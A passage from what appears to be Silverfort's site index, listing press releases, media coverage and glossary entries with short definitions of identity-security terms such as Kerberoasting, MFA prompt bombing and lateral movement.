Restrictions](https://thehackernews.com/2025/01/researchers-find-exploit-allowing.html#new_tab) - [Year in Review: Cybersecurity Reports That Shaped 2024 and Thinking About 2025](https://softwareanalyst.substack.com/p/year-in-review-cybersecurity-reports?utm_source=substack&utm_medium=email&utm_content=share#new_tab) - [How to Address an Overlooked Aspect of Identity Security: Non-human Identities](https://www.securityinfowatch.com/cybersecurity/article/55252694/how-to-address-an-overlooked-aspect-of-identity-security-non-human-identities#new_tab) - [How to Protect Your Environment From the NTLM Vulnerability](https://www.darkreading.com/endpoint-security/how-to-protect-your-environment-from-the-ntlm-vulnerability#new_tab) - [Silverfort Unveils Privileged Access Security: An Offering that Finally Solves the Critical Gaps of Traditional PAM Solutions](https://www.silverfort.com/press-news/silverfort-unveils-privileged-access-security/): The newest product is the first to provide seamless discovery, classification, and enforcement of security controls for all privileged accounts,... - [Silverfort Acquires Rezonate, Expanding its Cloud Identity Security Offering to Deliver the First Complete Identity Security Platform ](https://www.silverfort.com/press-news/silverfort-acquires-rezonate-to-deliver-the-first-complete-identity-security-platform/): With Rezonate’s acquisition, Silverfort continues to break down identity security silos across all enterprise environments, on-prem and in the cloud,... - [Silverfort's Identity-First Incident Response Solution Dramatically Cuts Investigation & Recovery Times From Weeks Down to Days ](https://www.silverfort.com/press-news/silverforts-identity-first-incident-response-solution-dramatically-cuts-investigation-recovery-times-from-weeks-down-to-days/): The new offering already assisted several Fortune 500 companies in recent breaches; complements existing incident response (IR) tools to help... - [Silverfort Expands Operations to India and South Asia, Bringing a Universal Approach to Identity Security to the Region](https://www.silverfort.com/press-news/silverfort-expands-operations-to-india-and-south-asia-bringing-a-universal-approach-to-identity-security-to-the-region/): An expansive partner network across the SAARC market ensures every business across the region will have access to a universal... - [Silverfort Launches the Identity Security Alliance, Enabling Advanced Integrations to Bring Identity Threat Intelligence and Security Across Both On-Prem and Cloud Identity Infrastructure](https://www.silverfort.com/press-news/silverfort-launches-the-identity-security-alliance/): Dozens of companies, Microsoft, Okta, Ping Identity, Splunk, Wiz and others, partner to help customers overcome the challenges of securing... - [Silverfort Unveils Global Partner Program to Meet Growing Demand for Unified Identity Protection](https://www.silverfort.com/press-news/silverfort-unveils-global-partner-program-to-meet-growing-demand-for-unified-identity-protection/): Channel industry veteran Leslie Bois leads the company toward its 100% channel-focused business strategy Tel Aviv, Israel & Boston –... - [Silverfort Research Finds Two-Thirds of Businesses Sync On-prem Passwords to Cloud Environments, Opening their Cloud to Cyberattack](https://www.silverfort.com/press-news/silverfort-research-finds-two-thirds-of-businesses-sync-on-prem-passwords-to-cloud-environments/): Company Unveils its Proprietary Identity Underground Report 2024; First Identity Report 100% Dedicated to Exposing Frequency & Prevalence of Identity... - [Silverfort Raises $116M to Deliver a Unified Layer of Identity Security Across All Enterprise Resources, Including Previously ‘Unprotectable’ Ones](https://www.silverfort.com/press-news/silverfort-raises-116m-to-deliver-a-unified-layer-of-identity-security-across-all-enterprise-resources/): Following 100%+ year-over-year revenue growth, with 100+ customers added quarterly, including multiple Fortune 50 companies, Silverfort announces Series D funding,... - [Silverfort, First to Deliver Automated Identity Protection of Thousands of Service Accounts With a Single Click—Securing Machine-to-Machine Communications](https://www.silverfort.com/press-news/silverfort-first-to-deliver-automated-identity-protection-of-thousands-of-service-accounts-with-a-single-click-securing-machine-to-machine-communications/): Customers can now discover, monitor, and protect their service accounts with fully automated visibility, risk analysis, and adaptive access policies... - [The Hacker News: Product Walkthrough: Silverfort's Unified Identity Protection Platform](https://www.silverfort.com/press-news/the-hacker-news-product-walkthrough-silverforts-unified-identity-protection-platform/) - [Safety Detectives: Interview With Gal Sadeh - Head of Data and Security Research at Silverfort](https://www.safetydetectives.com/blog/gal-sadeh-silverfort/#new_tab) - [Forbes: Rethinking The Framework Around Identity Security](https://www.silverfort.com/press-news/forbes-rethinking-the-framework-around-identity-security/) - [CSO: As perimeter defenses fall, the identify-first approach steps into the breach](https://www.silverfort.com/press-news/cso-as-perimeter-defenses-fall-the-identify-first-approach-steps-into-the-breach/) - [Silicon Republic – Why identity infrastructure is the new cyberattack surface](https://www.silverfort.com/press-news/silicon-republic-why-identity-infrastructure-is-the-new-cyberattack-surface/) - [SecurityWeek – Silverfort Open Sources Lateral Movement Detection Tool](https://www.silverfort.com/press-news/securityweek-silverfort-open-sources-lateral-movement-detection-tool/) - [IT Brew – Organizations woefully underprepared for identity surface threats, survey finds](https://www.silverfort.com/press-news/it-brew-organizations-woefully-underprepared-for-identity-surface-threats-survey-finds/) - [Security Boulevard – Open Sourcing Our Lateral Movement Detection Tool: LATMA](https://www.silverfort.com/press-news/security-boulevard-open-sourcing-our-lateral-movement-detection-tool-latma/) - [Help Net Security – Is your identity safe? Exploring the gaps in threat protection](https://www.silverfort.com/press-news/help-net-security-is-your-identity-safe-exploring-the-gaps-in-threat-protection/) - [Security Boulevard – How Silverfort Can Enable Utility Companies Take Advantage of FERC Incentives](https://www.silverfort.com/press-news/security-boulevard-how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/) - [CIO Influence – Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/cio-influence-silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/) - [Security Boulevard – MGM Breach Takeaway: On-Prem Has Become Attackers’ Gateway to the Cloud](https://www.silverfort.com/press-news/security-boulevard-mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/) - [CyberWire Pro – Casinos returning to normal, post-ransomware](https://www.silverfort.com/press-news/cyberwire-pro-casinos-returning-to-normal-post-ransomware/) - [The Hacker News – Think Your MFA and PAM Solutions Protect You? Think Again](https://www.silverfort.com/press-news/the-hacker-news-think-your-mfa-and-pam-solutions-protect-you-think-again/) - [Help Net Security – Companies need to rethink how they implement identity security](https://www.silverfort.com/press-news/help-net-security-companies-need-to-rethink-how-they-implement-identity-security/) - [Security Boulevard – Identity Protection Can't Be Taken For Granted Anymore](https://www.silverfort.com/press-news/security-boulevard-identity-protection-cant-be-taken-for-granted-anymore/) - [Israel Defense – Silverfort Research: 83% of organizations Experienced Identity-Related Breach](https://www.silverfort.com/press-news/israel-defense-silverfort-research-83-of-organizations-experienced-identity-related-breach/) - [CyberWire News Briefing – Identity protection trends.](https://www.silverfort.com/press-news/cyberwire-news-briefing-what-was-in-the-crash-dump-vulnerability-affects-booking-service-adversary-emulation-for-ot-networks-identity-protection-trends-estonia-warns-of-ongoing-cybe/) - [IT Online – Critical gaps in identity threat protection exposed](https://www.silverfort.com/press-news/it-online-critical-gaps-in-identity-threat-protection-exposed/) - [Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/): Inaugural State of Identity Security report finds that 83% of organizations experienced an identity-related breach Boston & Tel Aviv, Sept. 6,... - [Security Magazine – 94% of organizations don't have full visibility into service accounts](https://www.silverfort.com/press-news/security-magazine-94-of-organizations-dont-have-full-visibility-into-service-accounts/) - [TDWI – Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/tdwi-report-exposes-critical-gaps-in-identity-threat-protection/) - [VMBlog – Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://vmblog.com/archive/2023/09/06/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection.aspx) - [Security Boulevard – Time to Wake Up: The Defenses of the Identity Attack Surface are Broken](https://www.silverfort.com/press-news/security-boulevard-time-to-wake-up-the-defenses-of-the-identity-attack-surface-are-broken/) - [Silverfort Recognized as a Microsoft Security Excellence Awards Finalist for Zero Trust Champion and Security ISV of the Year](https://www.silverfort.com/press-news/silverfort-recognized-microsoft-security-excellence-awards-finalist-zero-trust-champion-security-isv/): Boston & Tel Aviv, March 20, 2023 — Silverfort, the leader in Unified Identity Protection, today announced it is a... - [CBS17: Scammers are using the SVB collapse to steal identities](https://www.silverfort.com/press-news/cbs17-scammers-are-using-the-svb-collapse-to-steal-identities/): Our Co-Founder and CTO, Yaron Kassner, talks to CBS17 about how businesses can protect themselves from attacks taking advantage of... - [Silverfort introduces five senior appointments](https://www.silverfort.com/press-news/silverfort-introduces-five-senior-appointments/): Unified Identity Protection leader continues its fast growth, with 50% of all executive team positions now held by women. Boston... - [John Paul Cunningham joins Silverfort as CISO](https://www.silverfort.com/press-news/john-paul-cunningham-joins-silverfort-as-ciso/): Career CISO with experience working for organizations such as Bank of Hope and J. P Morgan Asset Management joins Unified... - [Silverfort launches free identity risk assessment enabling companies to stay ahead of expanding cyber insurance requirements](https://www.silverfort.com/press-news/silverfort-launches-free-identity-risk-assessment/): Thursday 2 February 2023, Boston and Tel Aviv: Unified Identity Protection leader, Silverfort, today launched the most comprehensive free cyber... - [Howden Group simplifies cybersecurity insurance compliance with Silverfort’s Unified Identity Protection](https://www.silverfort.com/press-news/howden-group-simplifies-cybersecurity-insurance-compliance-with-silverfort/): Partnership enables international broker to offer customers in 45 countries effortless deployment of MFA on previously ‘unprotectable’ resources and automated... - [Security Boulevard: Flaw in Aged Boa Web Server Threatens Supply Chain](https://www.silverfort.com/press-news/security-boulevard-flaw-in-aged-boa-web-server-threatens-supply-chain/): Microsoft may have retired the Boa web server in 2005, but that hasn’t stopped widespread use—and now the company is... - [CPO Magazine: A Decade of Discussion and We’re Still Not Thinking Laterally](https://www.silverfort.com/press-news/cpo-magazine-a-decade-of-discussion-and-were-still-not-thinking-laterally/): Lateral movement has been a common factor in breaches for some time. As the effectiveness of perimeter defences has been... - [ComputerWeekly: LastPass probes new cyber incident related to August attack](https://www.silverfort.com/press-news/computerweekly-lastpass-probes-new-cyber-incident-related-to-august-attack/): The August 2022 cyber attack on LastPass seems to have begat another incident, according to company CEO Karim Toubba Credential... - [Forbes: New LastPass Hack Confirmed—Here’s What We Know So Far](https://www.silverfort.com/press-news/forbes-new-lastpass-hack-confirmed-heres-what-we-know-so-far/): On Wednesday, 30 November, LastPass CEO, Karim Toubba, confirmed that an unauthorized party had gained access to “certain elements of... - [Security Magazine: Iranian APT breaches government agency using Log4Shell](https://www.silverfort.com/press-news/security-magazine-iranian-apt-breaches-government-agency-using-log4shell/): Iranian government-sponsored advanced persistent threat (APT) actors breached the Federal Civilian Executive Branch (FCEB) and its network, according to a... - [Silverfort to Provide Acrisure Cyber Services Clients with Compliant Identity Protection](https://www.silverfort.com/press-news/acrisure-silverfort-partnership-announcement/): New partnership to help policyholders easily meet growing identity protection requirements Thursday 3 November 2022, Boston, MA: Silverfort, a unified... - [Spiceworks: How can organizations prevent lateral movement attacks by harnessing risk analysis and MFA?](https://www.silverfort.com/press-news/spiceworks-how-can-organizations-prevent-lateral-movement-attacks-by-harnessing-risk-analysis-and-mfa/): In a world that has grown accustomed to the inevitability of initial compromise, lateral movement is becoming the new battleground.... - [Washington Examiner: Finger-pointing over Uber hack](https://www.silverfort.com/press-news/press-washington-examiner-silverfort-comments-on-uber-hack/): On Sept. 19, the Uber hack was blamed on hacking group Lapsus$, which the company announced days earlier. Lapsus$ is an... - [Help Net Security: Tim Fleming joins Silverfort as Strategic Advisor](https://www.silverfort.com/press-news/press-help-net-security-tim-fleming-appointed-as-strategic-advisor/): Unified Identity Protection company Silverfort has appointed Tim Fleming as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over... - [Ex-Deloitte CIO joins Silverfort as Strategic Advisor](https://www.silverfort.com/press-news/ex-deloitte-cio-joins-silverfort-as-strategic-advisor/): Tim Fleming brings over 40 years’ risk management and innovation experience at large organizations to fast-scaling Unified Identity Security platform... - [Technology Magazine: How can organisations ensure cyber resilience?](https://www.silverfort.com/press-news/technology-mag-how-can-organisations-ensure-cyber-resilience/): Yaron Kassner, Co-Founder and CTO of Silverfort, spoke to Technology magazine about how businesses can develop cyber resilience. Keeping up... - [Security Magazine: Hashed passwords exposed in Slack vulnerability](https://www.silverfort.com/press-news/security-mag-hashed-passwords-exposed-in-slack-vulnerability/): Office communication platform Slack has admitted to accidentally exposing the hashed passwords of some users. According to Wired, the vulnerability... - [Silverfort Named #21 in Calcalist's List of the 50 Most Promising Israeli Startups](https://www.silverfort.com/press-news/silverfort-21-calcalist-list-50-most-promising-israeli-startups/): The field of identity verification in the cyber world is full of competition on the one hand, and saturated with... - [Silverfort Raises $65M Series C for World’s First Unified Identity Threat Protection Platform](https://www.silverfort.com/press-news/silverfort-raises-65m-series-c-worlds-first-unified-identity-threat-protection-platform/): Led by Greenfield Partners and strategic investors such as General Motors, the new funding will further accelerate the company’s growth... - [Silverfort Appoints Drew Schuil as Chief Revenue Officer](https://www.silverfort.com/press-news/silverfort-appoints-drew-schuil-as-chief-revenue-officer/): BOSTON & TEL AVIV, Israel–(BUSINESS WIRE)–Silverfort, the unified identity protection company, today announced the appointment of Drew Schuil as Chief... - [Silverfort Partners with IDSA to Build Awareness for Identity-Based Zero Trust](https://www.silverfort.com/press-news/silverfort-partners-with-idsa-to-build-awareness-for-identity-based-zero-trust/): Company will Work with the Identity Defined Security Alliance to Help Organizations Overcome Modern Authentication and Access Management Challenges BOSTON... - [Silverfort Introduces Industry First Prevention Against Pass the Ticket Attacks](https://www.silverfort.com/press-news/silverfort-introduces-industry-first-prevention-against-pass-the-ticket-attacks/): Until Now, Forged Kerberos Sessions Could Only be Detected Retroactively Boston and Tel Aviv, July 8, 2021 – Silverfort, the... - [Silverfort and Ping Identity Partner to Unify Risk Based Authentication Across Cloud and Hybrid Environments](https://www.silverfort.com/press-news/silverfort-ping-identity-unify-rba-across-cloud-hybrid-environment/): Product Integration Provides Comprehensive Visibility and Assessment of Access Activity that Enables Customers to Identify and Respond to Threats Boston... - [Silverfort Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Identity Trailblazer Category](https://www.silverfort.com/press-news/silverfort-microsoft-security-20-20-partner-awards-finalist-identity-trailblazer/): Company’s Unified Identity Protection Platform Consolidates Security Controls for On-Premises and Cloud Environments to Block Attacks Boston and Tel Aviv,... - [Silverfort Launches Unified Identity Protection Platform for Microsoft Azure Active Directory](https://www.silverfort.com/press-news/unified-identity-protection-for-azure-ad/): Platform Enables Organizations to Centralize Identity and Access Management (IAM) for Cloud and Legacy On-premises Resources on Azure Active Directory,... - [The Future of Work, Security and Women in Tech](https://www.silverfort.com/press-news/the-future-of-work-security-and-women-in-tech-2/): Aleta Jeffress (Status Go Episode 3) returns to discuss what’s changed... and what hasn’t changed in the last two years.... - [Silverfort Secures $30 Million in Series B Funding](https://www.silverfort.com/press-news/silverfort-secures-30-million-in-series-b-funding/): Boston, Tel Aviv August 4th, 2020 – Silverfort, provider of the industry’s first agentless, proxyless authentication platform, announced today that... - [[Hebrew] Silverfort breakthrough in MFA](https://www.silverfort.com/press-news/silverfort-breakthrough-in-mfa-hebrew/): In today’s new world, where nearly everyone is working remotely, passwords just aren’t enough to keep your company’s sensitive assets... - [The Silverfort Story: The Next Chapter](https://www.silverfort.com/press-news/the-silverfort-story-the-next-chapter/): During RSA Conference, we had a chance to connect with Dana Tamir from Silverfort to get the updated Silverfort story.... - [Addressing IAM Pain Points and Security Gaps](https://www.silverfort.com/press-news/addressing-iam-pain-points-and-security-gaps/): Hed Kovetz of Silverfort Reviews Holistic Agentless Approach to Secure Authentication - [Silverfort Named Winner of the Coveted InfoSec Award ‘Most Promising Cybersecurity Startup of the Year’ during RSA Conference 2020](https://www.silverfort.com/press-news/silverfort-named-winner-of-the-coveted-infosec-award-most-promising-cybersecurity-startup-of-the-year-during-rsa-conference-2020/): Silverfort’s Agentless Authentication Platform wins ‘Most Innovative Identity and Access Management’ In 8th Annual InfoSec Awards at #RSAC 2020 SAN... - [Silverfort Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Emerging ISV Disruptor](https://www.silverfort.com/press-news/silverfort-recognized-as-a-microsoft-security-20-20-partner-awards-finalist-for-emerging-isv-disruptor/): BOSTON, MA and Tel Aviv, Israel Dec. 17, 2019 — Silverfort today announced it has been named a finalist in... - [Silverfort Joins the Microsoft Intelligent Security Association](https://www.silverfort.com/press-news/silverfort-joins-the-microsoft-intelligent-security-association/): After Announcing a Co-Sell Partnership, the Companies Strengthen Their Relationship to Drive Secure Authentication in the Perimeter-less Cloud Era. October... - [Silverfort Recognized by 451 Research as a ‘451 Firestarter’](https://www.silverfort.com/press-news/silverfort-recognized-by-451-research-as-a-451-firestarter/): Provider of agentless, proxyless authentication platform recognized by leading analyst firm for innovation and vision in the technology industry BOSTON,... - [Silverfort Joins RSA® Ready Technology Partner Program](https://www.silverfort.com/press-news/silverfort-joins-rsa-ready-technology-partner-program/): Silverfort’s Agentless Authentication Platform enables joint customers to seamlessly extend RSA SecurID® Access to any sensitive system and apply Zero-Trust... - [Silverfort Named a Gartner Cool Vendor in Identity and Access Management for 2019](https://www.silverfort.com/press-news/silverfort-named-a-may-2019-gartner-cool-vendor-in-identity-and-access-management/): Vendors Included in 2019 Cool Vendor Report are Interesting, New and Innovative... - [Most Promising Israeli Cybersecurity Startups for 2019](https://www.silverfort.com/press-news/most-promising-israeli-cybersecurity-startups-for-2019/): Most Promising Israeli Cybersecurity Startups for 2019 - [Silverfort and Okta Partner to Enable Secure Authentication for ‘Unprotectable’ Systems](https://www.silverfort.com/press-news/silverfort-and-okta-partner-to-enable-secure-authentication-for-unprotectable-systems/): The new partnership will allow joint customers to seamlessly extend Okta Adaptive... - [Silverfort Named Winner of Most Innovative Adaptive Authentication InfoSec Award for 2019 by Cyber Defense Magazine](https://www.silverfort.com/press-news/silverfort-named-winner-of-most-innovative-adaptive-authentication-infosec-award-for-2019-by-cyber-defense-magazine/): Silverfort Named Winner of Most Innovative... - [Silverfort Achieves Microsoft Co-Sell Status](https://www.silverfort.com/press-news/silverfort-achieves-microsoft-co-sell-status/): Co-sell partnership to provide unparalleled access to Microsoft’s Enterprise customers. - [Industry Veteran Alan Cohen Joins Silverfort As Strategic Advisor](https://www.silverfort.com/press-news/industry-veteran-alan-cohen-joins-silverfort-as-strategic-advisor/): Cohen to advise on the company’s vision and scaling operations to meet growing demand for its agentless... - [The 9 new rules of IT leadership](https://www.silverfort.com/press-news/9-new-rules-leadership/): Silverfort’s CEO Hed Kovetz discusses the rapid changes in technology solutions and strategies, and explains... - [Not a breach: Citrix takes preemptive cybercrime strike, forces users to change passwords](https://www.silverfort.com/press-news/not-breach-citrix-takes-preemptive-cybercrime-strike-forces-users-change-passwords/): Dana Tamir, VP Market Strategy at... - [Multifactor Authentication Will Be Key for Businesses Protecting Cloud Assets](https://www.silverfort.com/press-news/multifactor-authentication-will-key-businesses-protecting-cloud-assets/): Silverfort’s CEO Hed Kovetz explains why mobile push notifications... - [Security 2019 Predictions - DZone Security](https://www.silverfort.com/press-news/security-2019-predictions/): Silverfort’s CTO Yaron Kassner reveals how security will evolve in the coming year. - [Zero Trust Security Gains Steam With IT Security Practitioners](https://www.silverfort.com/press-news/zero-trust-security-gains-steam-security-practitioners/): Silverfort’s CEO Hed Kovetz notes that a key aspect of a Zero Trust model is strong... - [IoT 2019 Predictions - DZone Security](https://www.silverfort.com/press-news/iot-2019-predictions/): Yaron Kassner, CTO at Silverfort, says IoT security will become an important initiative in 2019, read more... - [Silverfort Launches First Holistic AI-Driven Adaptive Authentication Engine for Securing Corporate Identities without Impacting Usability](https://www.silverfort.com/press-news/silverfort-launches-first-holistic-ai-driven-adaptive-authentication/): The agentless solution analyzes user... - [Silverfort Partners with Check Point to Deliver Threat-Driven Multi-factor Authentication (MFA)](https://www.silverfort.com/press-news/silverfort-partners-with-check-point-to-deliver-threat-driven-mfa/): The joint solution enables real-time step-up authentication response to detected threats... - [Silverfort Next-Gen Authentication App Now Available on the Palo Alto Networks Application Framework](https://www.silverfort.com/press-news/silverfort-next-gen-authentication-app-now-available-on-the-palo-alto-networks-application-framework/): Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet... - [Listen to the podcast ‘Their Story Chats’ with Silverfort Dana Tamir](https://www.silverfort.com/press-news/listen-to-the-podcast/): Listen to the podcast ‘Their Story Chats’ with Silverfort Dana Tamir discussing Multi... - [Silverfort Expands Executive Leadership Team To Drive Accelerated Growth And Innovation](https://www.silverfort.com/press-news/silverfort-expands-executive-leadership-team-drive-accelerated-growth-innovation/): Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet... - [Forget About Passwords, Advance to Multi Factor Authentication with Silverfort](https://www.silverfort.com/press-news/forget-passwords-advance-multi-factor-authentication-silverfort/): Silverfort is a Tel-Aviv Startup that protects enterprises from data breaches, cyber attacks... . . - [Chuck Harold from Security Guy TV at Blackhat 2018](https://www.silverfort.com/press-news/securityguy-tv-interview-silverfort-vp-market-strategy-danatamir-blackhat-2018/): SecurityGuy TV interview Silverfort VP Market Strategy DanaTamir at Blackhat 2018... . - [Black Hat USA 2018 Conference Focuses on Cyber Threats and Unique Solutions](https://www.silverfort.com/press-news/black-hat-usa-2018-conference-focuses-cyber-threats-unique-solutions/): Hed Kovetz, co-founder & CEO of Silverfort, spoke about the recent Reddit security breach. “Implementing multi-factor... - [Silverfort's Co-Founder and CEO, Hed Kovetz on the Reddit breach](https://www.silverfort.com/press-news/silverforts-co-founder-ceo-hed-kovetz-reddit-breach/): Implementing multi-factor authentication (MFA) on servers and applications is currently a difficult and resource-consuming task... - [Data Breaches at Timehop, Macy's Highlight Need for Multi-Factor Authentication](https://www.silverfort.com/press-news/data-breaches-timehop-macys-highlight-need-multi-factor-authentication/): Names, email addresses, and some phone numbers belonging to 21 million people exposed. . - [Silverfort Raises $11.5 Million in Series A to Deliver the Next Generation of Multi-Factor Authentication](https://www.silverfort.com/press-news/silverfort-raises-11-5-million-series-enable-multi-factor-authentication-without-integration/): Silverfort’s revolutionary authentication platform delivers adaptive multi-factor authentication... - [Silverfort Announces New Threat-Driven Multifactor Authentication App for the Palo Alto Networks Application Framework](https://www.silverfort.com/press-news/silverfort-announces-new-partnership-palo-alto-networks/): Silverfort, which enables strong authentication... - [Silverfort Expands North American Presence with New Offices in Boston and Houston](https://www.silverfort.com/press-news/silverfort-expands-north-american-presence-new-offices-boston-houston/): Expansion enables Silverfort to strengthen its North American operations --- ## Glossary - [Honeypot Account](https://www.silverfort.com/glossary/honeypot-account/): A decoy user account planted in a system solely to entice attackers and instantly alert the security team when accessed,... - [Identity Verification](https://www.silverfort.com/glossary/identity-verification/): The process of validating that an individual is who they claim to be, often through document checks, biometrics, knowledge-based methods,... - [Machine Identity](https://www.silverfort.com/glossary/machine-identity/): The digital credentials (such as certificates, cryptographic keys, and service account accounts) assigned to devices, applications, and services, enabling trusted... - [Identity Security](https://www.silverfort.com/glossary/identity-security/): Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise. - [Credential Access](https://www.silverfort.com/glossary/credential-access/): A stage in the cyberattack lifecycle where adversaries obtain legitimate credentials to impersonate users and bypass security controls. - [Compromised Credential](https://www.silverfort.com/glossary/compromised-credential/): Login details—such as usernames and passwords—that have been stolen or exposed and can be misused for unauthorized access or lateral... - [Identity Threat Exposure](https://www.silverfort.com/glossary/identity-threat-exposure/): Security weaknesses—such as misconfigurations, outdated identity systems, or exploitable built-in features—that expose organizations to identity-based threats like credential theft, privilege... - [Privilege Escalation](https://www.silverfort.com/glossary/privilege-escalation/): A type of attack in which an adversary acquires higher access controls—either by exploiting bugs or misconfigurations—to perform unauthorized operations. - [Unconstrained Delegation](https://www.silverfort.com/glossary/unconstrained-delegation/): A Kerberos delegation type that allows a service to act on behalf of a user to any other service, posing... - [Kerberos Delegation](https://www.silverfort.com/glossary/kerberos-delegation/): A Kerberos mechanism that allows services to act on behalf of authenticated users to access other services, with variants—unconstrained, constrained,... - [Kerberoasting](https://www.silverfort.com/glossary/kerberoasting/): A stealthy AD attack where adversaries request Kerberos Ticket Granting Service (TGS) tickets for service accounts, then crack them offline... - [Prolific User](https://www.silverfort.com/glossary/prolific-user/): A user who frequently accesses multiple systems or performs numerous actions, often generating high volumes of identity activity that may... - [MITRE ATT&CK Framework](https://www.silverfort.com/glossary/mitre-attack-framework/): A globally recognized knowledge base of adversarial tactics, techniques, and procedures used to simulate, understand, and defend against cybersecurity threats. - [Cyber Security Compliance](https://www.silverfort.com/glossary/cyber-security-compliance/): Adherence to laws, regulations, and standards (e. g. , HIPAA, GDPR, PCI DSS, SOX) governing how sensitive data must be handled... - [Adaptive Multi-Factor Authentication](https://www.silverfort.com/glossary/adaptive-multi-factor-authentication/): A risk-based authentication system that evaluates login context using AI and machine learning, prompting for extra factors only when a... - [Non-Human Identity](https://www.silverfort.com/glossary/non-human-identity/): Digital identities assigned to systems, bots, or services rather than people—like service accounts or automated agents—that require management and protection... - [Identity Security Posture Management](https://www.silverfort.com/glossary/identity-security-posture-management/): The continuous process of auditing and strengthening IAM environments—such as user access, authentication methods, and entitlements—to remediate vulnerabilities and reduce... - [Ransomware](https://www.silverfort.com/glossary/ransomware/): Malicious software that encrypts an organization’s data or systems and demands a ransom to release the decryption key, often coupled... - [Credential Theft](https://www.silverfort.com/glossary/credential-theft/): The act of stealing login credentials through methods like phishing, malware, brute-force attacks, or data breaches, allowing unauthorized access and... - [Attack Surface Management](https://www.silverfort.com/glossary/attack-surface-management/): The ongoing process of discovering, monitoring, and reducing an organization’s vulnerabilities and exposed assets to shrink its attack surface. - [Identity Infrastructure](https://www.silverfort.com/glossary/identity-infrastructure/): The collection of systems, authentication mechanisms, and access control policies enabling secure creation, verification, and management of digital identities within... - [Risk-based Authentication](https://www.silverfort.com/glossary/risk-based-authentication/): A dynamic authentication method that assesses contextual risk factors—such as location, device, and behavior—in real time and adjusts authentication strength... - [Identity Fabric](https://www.silverfort.com/glossary/identity-fabric/): A unified, interconnected IAM architecture that dismantles siloed identity systems to centrally coordinate provisioning, authentication, and access governance across hybrid... - [Identity-Based Attack](https://www.silverfort.com/glossary/identity-based-attacks/): Cyberattacks that exploit compromised credentials to misuse legitimate authentication paths, enabling attackers to evade detection and access both on‑premises and... - [MFA Fatigue](https://www.silverfort.com/glossary/mfa-fatigue/): A vulnerability where users become overwhelmed by constant multi-factor authentication prompts, potentially leading to inadvertent approval of fraudulent access attempts. - [User Account](https://www.silverfort.com/glossary/user-account/): A digital identity representing a specific person—used to authenticate and control access to systems, applications, and data. - [Attack Surface](https://www.silverfort.com/glossary/attack-surface/): The comprehensive set of digital and physical vulnerabilities and entry points through which an attacker might gain unauthorized access to... - [User Authentication](https://www.silverfort.com/glossary/user-authentication/): The process of verifying an individual's claimed identity (e. g. , via passwords, tokens, or biometrics) before granting access to... - [Identity Threat Detection and Response](https://www.silverfort.com/glossary/identity-threat-detection-and-response/): A security approach that monitors and analyzes identity‑related activities to detect credential theft, privileged misuse, or lateral movement, triggering automated... - [Unified Identity Protection](https://www.silverfort.com/glossary/unified-identity-protection/): A consolidated security approach that provides centralized visibility and automated safeguards across all identity types—human and machine—to detect and respond... - [Principle of Least Privilege](https://www.silverfort.com/glossary/principle-of-least-privilege/): A security principle where users and systems are granted only the minimal access levels necessary to perform their functions, limiting... - [Privileged Account](https://www.silverfort.com/glossary/privileged-account/): An account with elevated permissions (such as administrator or root access) that allows extensive control over systems and data—making it... - [Identity Segmentation](https://www.silverfort.com/glossary/identity-segmentation/): A cybersecurity strategy that isolates users into groups based on roles, attributes, or behavior in order to enforce least‑privilege access... - [Azure AD](https://www.silverfort.com/glossary/azure-ad/): Microsoft’s cloud-based identity and access management service offering single sign-on, multifactor authentication, and integration with on‑premises Active Directory for hybrid... - [Zero Trust](https://www.silverfort.com/glossary/zero-trust/): A cybersecurity framework that eliminates any implicit trust within a network by continuously verifying every user and device, enforcing least-privilege... - [Credential Stuffing](https://www.silverfort.com/glossary/credential-stuffing/): A cyberattack technique where automated tools test stolen or leaked credentials across multiple services to gain unauthorized access due to... - [Cyber Insurance](https://www.silverfort.com/glossary/cyber-insurance/): Insurance designed to protect individuals or organizations from financial and operational losses caused by cyber events, such as data breaches... - [Multi-Factor Authentication (MFA)](https://www.silverfort.com/glossary/multi-factor-authentication-mfa/): A security measure requiring two or more distinct forms of identity verification—such as a password plus a token or biometric—for... - [Privileged Access Management (PAM)](https://www.silverfort.com/glossary/privileged-access-management-pam/): Technologies and policies that manage and monitor elevated-level user access (e. g. , administrators), enforcing strict controls and reducing security... - [Air-Gapped Network](https://www.silverfort.com/glossary/an-air-gapped-network/): A highly secure, physically isolated network with no external connectivity, used to safeguard highly sensitive systems in sectors like defense... - [Adaptive Authentication](https://www.silverfort.com/glossary/adaptive-authentication/): A dynamic security method that uses contextual signals like device, location, and user behavior to determine whether additional authentication is... - [Active Directory](https://www.silverfort.com/glossary/active-directory/): Active Directory (AD) is Microsoft’s centralized directory service that organizes and manages user accounts, computers, groups, and other network resources,... - [Identity Zero Trust](https://www.silverfort.com/glossary/identity-zero-trust/): A security model where no identity—whether of users, devices, or apps—is inherently trusted; instead, every access request is individually verified... - [Service Account](https://www.silverfort.com/glossary/service-account/): A non-human identity used by applications, services, or automated processes to interact with systems—often needing stringent security oversight. - [MFA Prompt Bombing](https://www.silverfort.com/glossary/mfa-prompt-bombing/): A targeted attack in which adversaries flood users with authentication requests to wear them down into approving false login attempts. - [Lateral Movement](https://www.silverfort.com/glossary/lateral-movement/): A tactic used by threat actors to stealthily navigate across compromised systems within a network, escalating privileges and reaching high-value... - [Identity and Access Management (IAM)](https://www.silverfort.com/glossary/identity-and-access-management-iam/): A framework of policies, processes, and technologies for creating, managing, authenticating, and authorizing digital identities to ensure that the right... - [Identity Protection](https://www.silverfort.com/glossary/identity-protection/): Measures and proactive monitoring aimed at safeguarding individuals’ personal data and accounts from theft, fraud, or unauthorized use. - [PsExec](https://www.silverfort.com/glossary/psexec/): A Windows command-line tool used for executing processes on remote 